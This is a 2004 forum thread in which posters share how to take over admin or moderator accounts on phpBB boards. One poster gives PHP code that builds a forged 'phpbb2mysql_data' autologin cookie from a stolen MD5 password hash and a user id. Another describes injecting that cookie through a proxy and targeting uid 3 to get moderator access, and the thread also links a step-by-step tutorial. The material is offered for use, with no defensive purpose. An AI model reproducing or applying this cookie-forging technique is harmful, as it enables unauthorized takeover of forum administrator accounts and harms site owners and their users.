icenix
May 20 2004, 10:33 PM
i got my friend janek to write a tutorial...
its available at
http://waraxe.us/forum/viewtopic.php?t=8tells you how to get admin on a PHPBB Board after you have extracted the admin uid and hash. very step by step. i would recommended for all.
take it easy all..
schnibble
May 21 2004, 02:55 AM
man, if u only posted this yesterday, i broke my head off examinig phpbb code to come to the same conclusion.
It's really simple, after all...
here's the PHP code that i came with for creating cookie session:
| CODE |
<?php
$password = "c4ca4238a0b923820dcc509a6f75849b";
$userid = 2;
$cookiename = "phpbb2mysql_data";
$autologin=array();
$autologin["autologinid"]=trim($password);
$autologin["userid"]=$userid;
$res=serialize($autologin);
$res = urlencode($res);
$cookie = "{$cookiename}={$res}";
echo $cookie;
?>
|
take care to put MD5 hash in lower-case letters.
For cookie posioning i used WebProxy from @stake.
Upper code could be easly upgraded, so if enyone has the will...
xlulux
May 21 2004, 03:51 AM
hey there
i was examining the hack and although i dont understand what he did for the md5 i get that the uid=3; means that he wanted to get the MODERATORS account, cause i did some research of my own and found that most moderators have uids of 3 :-D hehehe hoooooow nice huh?
anyways im sure that you all knew that but i wanted to tell the newbies
icenix
May 23 2004, 10:59 AM
wow...
webproxy huh?
just had a read about it..
ive been in the game awhile and i havnt heard of that!
cheers buddy
my thanks goes to schnibbles
